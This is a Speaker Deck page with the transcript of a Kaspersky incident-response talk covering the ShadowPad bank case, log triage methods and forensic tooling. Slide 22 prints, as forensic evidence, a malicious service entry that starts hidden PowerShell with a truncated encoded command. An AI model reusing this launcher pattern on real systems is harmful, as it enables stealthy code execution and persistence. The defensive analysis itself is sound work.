Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Sergey Golovanov - Indecent Response 2018

DC7499
February 10, 2018
Education
0
330

Sergey Golovanov - Indecent Response 2018

DC7499

February 10, 2018
Tweet

More Decks by DC7499

See All by DC7499
Sergey Sobko - Hackashop: Hackathon + Pentest + Workshop [RU]
defcon
0
340
Dmitry Sklyarov - Intel ME: Security keys Genealogy, Obfuscation and other Magic
defcon
0
200
Anton Lopanitsyn - Initial reconnaissance of web applications.
defcon
0
230
Dmitry Volkov - Private messengers: without pain??
defcon
1
210
Andrey Skuratov and Sergey Migalin - DNS tunneling in 2018. What is that, and what to do with it?
defcon
1
170
Sergey Belov - Another side of Bug Bounty programs
defcon
0
210
Dmitry Sklyarov - Intel ME: Flash file system explained
defcon
0
340
Maxim Goryachiy & Mark Ermolov - Inside Intel Management Engine
defcon
0
390
Kupreev Oleg & Putin Vladimir - Your very own driver for the custom NVMe device from the scratch: reading of the flash memory of iPhone 7
defcon
1
420

Other Decks in Education

See All in Education
samurai-juku recruiting deck_v20230211
samuraijuku
0
120
Comment aborder et contribuer sereinement à un projet open source ?
pylapp
0
410
Introduction - Lecture 1 - Advanced Topics in Big Data (4023256FNR)
signer
PRO
1
580
Introduction - Lecture 1 - Next Generation User Interfaces (4018166FNR)
signer
PRO
0
2.4k
Human Perception and Colour Theory - Lecture 2 - Information Visualisation (4019538FNR)
signer
PRO
0
1.2k
公開用編集版_奈良女子大学プレゼンセミナー_20220826
mashun07
3
180
Padlet opetuksessa
matleenalaakso
3
6.3k
山梨県・北巨摩地区中学校英語研修会 夏季学習会
hirokiyamazaki
0
130
20230120 麻布大学 特別講義/デジタルマッピングワークショップ
fullfull
0
150
ChatGPT と自然言語処理 / 言語の意味の計算と最適輸送
eumesy
PRO
19
11k
子育てエンジニア達のLT大会_CTOの小学校お受験
fast_doctor
0
160
MT法を用いたパーマーペンギンの種類判別
sogonista
PRO
0
280

Featured

See All Featured
Stop Working from a Prison Cell
hatefulcrawdad
264
18k
Building an army of robots
kneath
300
41k
Building Your Own Lightsaber
phodgson
96
4.9k
Bootstrapping a Software Product
garrettdimon
299
110k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
270
12k
The Web Native Designer (August 2011)
paulrobertlloyd
77
2.3k
How to Ace a Technical Interview
jacobian
270
22k
VelocityConf: Rendering Performance Case Studies
addyosmani
317
22k
Designing for Performance
lara
600
65k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
349
27k
How GitHub (no longer) Works
holman
299
140k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
31
20k

Transcript

  1. Indecent response 2018
    Sergey @k1k_ Golovanov
    Principal Security Researcher
    Kaspersky Lab

    View Slide

  2. Challenge: find a SDC bus speed

    View Slide

  3. View Slide

  4. Agenda
    1.Shadowpad
    2.0x403AA91EE
    4.Plans
    3.Scanner2

    View Slide

  5. 1.Shadowpad

    View Slide

  6. Case overview:
    1.Antifraud system in a bank is detecting
    printing of a lot of elite cards for the last several
    hours
    2.Bank is starting network audit
    3.Bank is discovering suspicion DNS requests
    4.Forensics can not find malware on PCs
    5.Bank asks for help…

    View Slide

  7. DNS requests

    View Slide

  8. View Slide

  9. View Slide

  10. “Our worldwide customers range from
    small businesses right up to global Fortune
    500 companies.” NetSarang
    AmericanExpress
    BankofAmericaCorp.
    BankofChina
    BNPParibas
    Citigroup
    DeutscheBank
    Fortis
    GeneralElectric
    INGGroup
    MerrillLynch
    MorganStanley
    ShinhanFinancialGroup
    SocieteGenerale
    UBS
    https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara
    ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru

    View Slide

  11. https://securelist.com/shadowpad
    -in-corporate-networks/81432/

    View Slide

  12. What was done?

    View Slide

  13. AutoMA – static analysis framework

    View Slide

  14. Shadowpad after autoMA

    View Slide

  15. Miniduke after autoMA

    View Slide

  16. 2.0x403AA91EE

    View Slide

  17. Case overview:

    View Slide

  18. View Slide

  19. View Slide

  20. How to find suspicion DNS requests?
    sort | uniq -c | sort -rn

    View Slide

  21. How to find suspicion powershell?
    sort | uniq -c | sort -rn

    View Slide

  22. parse_evtx.exe System.evtx | findstr /i "power" | more
    Record #2396788 2027.02.22-08:03:00 'Computer':PC1',
    'Channel':'System', 'EventSourceName':'Service Control Manager',
    'Guid':‘GUID'Name':'Service Control Manager',
    'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04,
    'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the
    system.), 'Qualifiers':16384, 'Keywords':8080000000000000,
    'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692,
    'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID,
    'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min
    powershell.exe -nop -w hidden -encodedcommand
    JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A
    FMAdAByAGUAYQBtACgA

    View Slide

  23. https://github.com/KasperskyLab/ForensicsTools/

    View Slide

  24. 3.Scanner2

    View Slide

  25. Case overview:
    1. No money
    2. No logs
    3. No team
    4. No idea about network
    5. CISO!

    View Slide

  26. What to do?
    we need logs
    we need mfts
    we need regs

    View Slide

  27. WE NEED TO RECOMPILE EVERYTHING!

    View Slide

  28. Awesome batch file

    View Slide

  29. How to find something suspicion ?
    sort | uniq -c | sort -rn

    View Slide

  30. https://cdn.securelist.com/files/
    2017/12/HappyNewYear.zip

    View Slide

  31. 4. PLANS

    View Slide

  32. 1. MFT is a hell. Sleuthkit is not enough. We need
    more data about deleted files.
    2. USN J is required with no HDD touch.
    3. Reg analysis is needed with unallocated part.

    View Slide

  33. Agenda
    1.Shadowpad
    2.0x403AA91EE
    4.Plans
    3.Scanner2

    View Slide

  34. Зачем?

    View Slide

  35. View Slide

  36. Thank you!
    Sergey @k1k_ Golovanov
    Principal Security Researcher
    Kaspersky Lab

    View Slide